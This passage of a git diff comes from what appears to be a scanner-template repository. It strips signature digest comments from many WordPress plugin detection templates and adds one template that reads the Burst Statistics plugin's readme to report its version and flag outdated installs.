b/http/technologies/wordpress/plugins/antispam-bee.yaml index b60c118087..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008e97f7ce1c0f70622bcd849195aad24eb09e68dfe1e0dbab8fe3883e4217f342022100b9fe66d5cfebb2d04618064a09425b59312288d27748eaf31adfae0c2509a074:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 6c7e5c2851..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022032e43d112b69faec55c7212e1d957e51c217b5968e01bf475e673d50f7942b2f0221009c65abda740770c392cc846db83a5638992a4bc01819b90ce4866bac829c02c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index bc9a0233b5..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100ef682699fbd5c1e1f267ef189b9a421652b1abed556524612a91511ac64933bf022100d1fce072ef280ad4ee9bcf4c5f6324173a6312ceef0c53c9235525a7b9d6ac2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 3a4bdaab4e..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f7aa6af6e64b6c4d9a93619fb3a7ac5918b604ec8380c75b234806c86b4400ce0220773822c1fc4e444f4ed95aa9422115fc1cf8d901fe5e579ae375396864f8b6cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index bfa93d829a..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100aa04f21c9e18a99aaee75511755c88dc7cf409c6e5f585305e8d08e670b35fe90221009555c94d0549820ab201bbf8b5822d28f13d1566e05a730ba3a53ef850b3b658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 589b07b884..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210099c33d298a05281f01badf87943883ebac8df6e862c2f192aca3f9f943f18c4b02206629a39c5978d4f45fb98a17b0e87d2d26da4a01514efc5d26fd4cc8a019f244:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 8de80f4ab9..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f522cb95db2a3f3c8a01d82b189e42baa9db66e6f48be48e1246a10dc451390102203261d238c67fcc206b4533a82ae07ee88cc8c60d148780be9408bfa6467a6155:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index dc04d1b8ea..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f6a81c87840aec92d8afe3bb7b18fd4934f34e113ecfe47da746025bd88003eb022100938d47162e040a8474ff77188526bcaf054bc149c03336deafe67e0082107721:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 7e4594414c..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022005674bda0a0ef266315919abe290189851cbc35d45848aee157aec93ab54210b02203c285105872a5d8506b0a77799e15eaed4b5760335fd03d56a323e7d3fd14b8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 82396896e7..f8691caf0a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203f363a21356dcf607e08f6f92faf13e95f7b2239a5953cc380845f491835c7a802206eaba11ac6ecce9da6931f87538a6456baaa6e0928399863c28dabfa2f965f39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/burst-statistics.yaml b/http/technologies/wordpress/plugins/burst-statistics.yaml new file mode 100644 index 0000000000..055268ad8f --- /dev/null +++ b/http/technologies/wordpress/plugins/burst-statistics.yaml @@ -0,0 +1,48 @@ +id: wordpress-burst-statistics + +info: + name: Burst Statistics – Privacy-Friendly Analytics for WordPress Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/burst-statistics/ + metadata: + plugin_namespace: burst-statistics + wpscan: https://wpscan.com/plugin/burst-statistics + tags: tech,wordpress,wp-plugin,top-200 + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/burst-statistics/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/burst-statistics.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 8fe1943684..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206dc1c2729da96e43deee9e49ac474a0016d559ed6fe2b0139bb98ee076e27320022001d161375f91e171f85b7369c567412fe7ac844c524aceb94c8e1203e9dc9f93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index a12a57a088..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200aed1c9f41cd28681f24f6b69547a8326438654f08090c614cdb51b5f23bcc12022100bbaad455741de721a6a1d7e97399ce9a536b520e96e3bff92ba0a7d7610f9ee3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index d7d7f13b7e..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022056810a325b2125be237f0b9b184c0e66f093d9a9ab5297dbed00a64fee9b6065022014e9b869de833fdf03bc85614b73756c008388c0f9aef50f4d760dee9609db8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index c2adedb81a..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e32259e204ca0b4130027f777844ca9c0618126e5365cd1dfc93db409e7ce28d022077b6f5c4735da47c0bdebfc7fc41dde137ce3742bcf094df63c29700d32540ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index a68f7f2c3c..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220054f1411925876147d8b0cdef5d42256faf761961dba46dea37cd52075d4d58602204fcb974b3e3d28f9e2c9a9b4da645c18c0e43d759e1236ff655d977c27472d16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 7096a56742..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c197ed46a95d1df8a5dbb23f5e7d0079de0ed855d201cc70e8de0ed6bd3e4151022100aeadadd38bbed994bf76a386b70e976f2d741d3b04d27233b0d7cf4b7de12432:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 0c7b8e13c8..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220227c4d1f9637ad2610944ae85d0752de319a20a5cc89668441066158711837df0221009cd22793d4a3ea26a2913f5b7741d0ab1bfd50e0d71e1af13e1431d1ff79fe0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index a4fe0f4b47..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022018128dce37e285353d5953399f9af443f90ffed2ebf27b5b80739efc51a20403022100b1e820aea138f8124e1a6ce924e00e3e1ec455389cb9a3ae518772a8851c9a02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 9b41282ad1..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022065990e08754d834b2974fa3cc73fe266b5f5be84d6eca2b3335ce846afa0bfde022100e7d8f41e8eb6fb2f2da955ad8a105a8eb03e63e6637d15dbd083930a61f50f40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 31797f3e56..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a9845ebf44f1e6900ebfd999f8fab3f0bb380489cd16a6dbc0b9e345cc2f36f4022100b30bbcaa49a051eafdb3d42bd99fc42231f74751e08acbbf9a3aa5c6f0b8bb4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index f05456d4a0..e13909fff3 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220503b03426ec1397a9ed90c5faedaf0e407e59654bae91c95361cd2f53c7c113e0220313ce8255f700d591c6d3600a8779fbc961ca8f66421d2b3b128703bd9b75dc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 391db3b32c..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008f947d27f4cacb26ebf12ab66b4e320cfe1176540cdc4bba8fc182431dca5b7a022100d9f96ac7e41ce65cc5defb23c563afe6839954caf111dd924e858210ce0d299d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 87fdd9131a..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ad341175182ceeb69bb332cbf2595544b48c5928177e2d3312004e5f8f920bb8022035cdefe706b9cb1663b8826be1fe679da8e1d95eaf7f1905748300f0d00f3748:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 1c7fa24eab..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205b28c9184e170f2001abce96cb9d2da30bb7fe895a4ccbff8e13d10a9b7cdb270220356b210662f24b14cb50786dadfffc21dbe58eb65fd7c83afbca061d04803509:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 769a22466e..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b6c04234b9d5ccb286c7b44471d85edd74e8a7f1ad021f241e148eb259dd5b2c022064154c7b24ebfe842b53ac2e159557500ebcf4ad2b5a7faf6694362ce6faeb2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index d42562cee4..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100930ffd7dfdb426e23e86b7c0349fab8f21255d23b2c43b229b5326bda825b3320221009399c507b688b5a4451dbabc6fbf3a8b5c97490322d7b15f9417e3f7f70db223:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 67388d87b8..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502206bf3986464eed4c6cffb94ab5292987b763dc0fd53a6bcd94e82c5899246f47b022100984ca461770b6eb42a184ca0c2604c4f0fd22a7907a83ec1f1714aae2675d0a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 7734a06704..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100cc04c11c42a0265796496b9d36d2b4de3158b46e9a9185919c35f530b6bb47f5022100f8c148009822262ddee9d12f9c4e3a1ab7f9f6d2db90f4db96a844682093f48f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 14e5bf5faa..dafbd25c9e 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022072c1bec865695ea7cf1a02c25f7cb12aafaaba4e641043869a96ab44f53dfff3022100d2cb7c348387f766c9744f53d13560f9490c64d3eb19b9902c0d6f7619495f01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index e13bae48aa..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502205956ef315521b615f7e870900f7329ad7b14e402678225695a98b2bacd242bfc022100eccf5cf5ecb34eafca42f9d2d61c7dc9a8a4f5b0dd9ed040ca35317a88b67f54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index f688f54cba..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207a352c4c2a22a01dcc746995a72a877454a165846cbf0508daaaddf5a19c41b90220773af37738e0081ab4fd24786f901932791914f786cbba3de0b01f87c81c6bf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 57011be7e9..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e542042e67ec74763762f7d2699e01eb25092f19c5053d3daeb2e5f9ed5a16500220180763e3344e884e017ed4a434d66f52b43ecbd6738c32194576761c51ecc210:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 233b630155..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200edd9cd1e97afbb6a09d05ea96af1f33c0c54404a035e093f11f7afc1012f8ea022100c5d284bf2b625a3efa007fdfbaeff7f0fd7ac533909112f6bcffe3d6c8e07c92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index d6e6cb95fc..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022028f202c8b90689ee3490c6ed0c87fd947b27e66597770775c5d4756cf48f9399022100b537f8483ecc3256a039be9a313706fe0193b3db2aeff6f79c6c599c0c634e8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 2443adae65..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022069afb2f0f7eafe9d065b925effbd23f18f67c28531d77bdc3fa20eaa2e21c705022100e302e5facb9d60814a7db0789e0e4b32c7a69c4941f014d9e7552fd457dec0a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 60a0ac054f..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100802c8b8c41d7146bb9b84c6bf6807213d11ddd032c03a3e4c16024847ab7bb9402210085c5a1d42c6ab67aa5d8523cf32a24b5b7dfaaf6d9f1e62e3ad0f04766e6f405:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index a881913ee3..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d98ea95d3667d17e7ba84bf261156841f4411c0667d3bf7331631ba2b8ffc3bb022042ff5bb2b0b37a35a48cf92ecc495a604224579c560aa68a2f6fe1022b0380f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index dddac80856..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b6d6253af73eff424f28e2d56721adf6ea91e929ee47d27103b7b1506f057b70022100c39de3f6bef7143f646f44a59581553363ecdd3681e307a42d82e9f103d33701:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 07132465b4..fe4c223cba 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008616db345f8ea4c263cb17a8aa834ffeaec077c5ffb9def656f0357516c5e8b0022100b88256bf7ab0e8da2fe1307c3fc8527fc36b59dfaa49645d1ded13fd1c7b7672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index e5019c37ed..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b2489e2a5b87d170d13cc2fdbf26ab478a04cb5eefd6acfadab75179ef68fe050220245cd1ab6f2ffe1605918d4efddecb0a58d5a2a00d324e8990e60de118c82c6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 7356082f7c..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100dc394d46517aa2162d1b671be27696e472bec6a0208f8ba82d4ea1224c2fc70c022100ca01d5c506c7d5e476bb86b77733f66f47be058d7f3c90db1fcf090cba64ba24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 3731a2a125..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204aad86decc3d35cf4b65e27c4c664d2b1258b26d475e3df0a41c89625746a37502200629c61ec0739dcc77e53eface1bd7bd5855c7b9d3b26f57b12740687d54b861:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index d39d3cd166..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502205f4ffd621ad8ab4ecc8de245bd3b32d0da059c4022a5c1fb73cd4cf9c7832f9c022100c8332b53b4f2b82d69ea3a4f841f4929eb46c7610956fa9cf3d61b7e555479f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 34a0eb814c..5ea77f898d 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502206c9d421b4c6ce86f1e0e61069e6edc000e7ab34f05d45158744721d697ec7fa8022100818d72ce0426a0dede06d65662fced7eec5c60695f348f036e3a5190f8e17d35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4ba98aad47..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200abb59e56943bbc46fd785bf5ad8f8289b5974721e8a79f8e4ef82af3e58def50221008403937ef9709da7ec66b463c0215106eb6daf64b67a3de0f43888b4ca7b2085:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/extendify.yaml 